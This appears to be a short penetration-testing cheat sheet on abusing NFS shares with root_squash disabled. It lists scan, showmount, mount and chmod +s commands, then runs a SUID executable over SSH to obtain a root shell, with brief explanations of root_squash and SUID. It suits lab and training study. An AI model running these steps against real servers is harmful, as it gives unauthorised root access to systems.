Exploiting NFS
Requirements
nfs-common package should be installed
Steps
# Nmap scan to find NFS port, be careful as this scan is NOISY and might take a long time
nmap -T5 -vv -p- IP
# List NFS Shares
/sbin/showmount -e IP
# Mount NFS Share
sudo mount -t nfs IP:share /tmp/mount -nolock
# Set root SUID for the executable file
chmod +s [filename]
# Make sure file is executable
chmod +x [filename]
# SSH into target machine and run executable with -p so permissions persist and you get root shell
./[filename] -p
What is root_squash?
By default, Root Squashing is enabled on NFS shares, this prevents anyone connecting to the NFS share form having root access to the NFS volume
Remote root users are assigned a user "nfsnobody" when connected, with least local privileges
If it is turned off, it can allow the creation of SUID bit files, allowing a remote user root access to the connected system
What are files with the SUID bit set?
The file or files can be run with the permission of the file(s) owner/group, in some cases as the super-user
This can be leveraged to get a shell with these super-user privileges
Method
You can upload files to the NFS share, setting the permissions of the file
Then log in through SSH and execute the file to gain a root shell
Last updated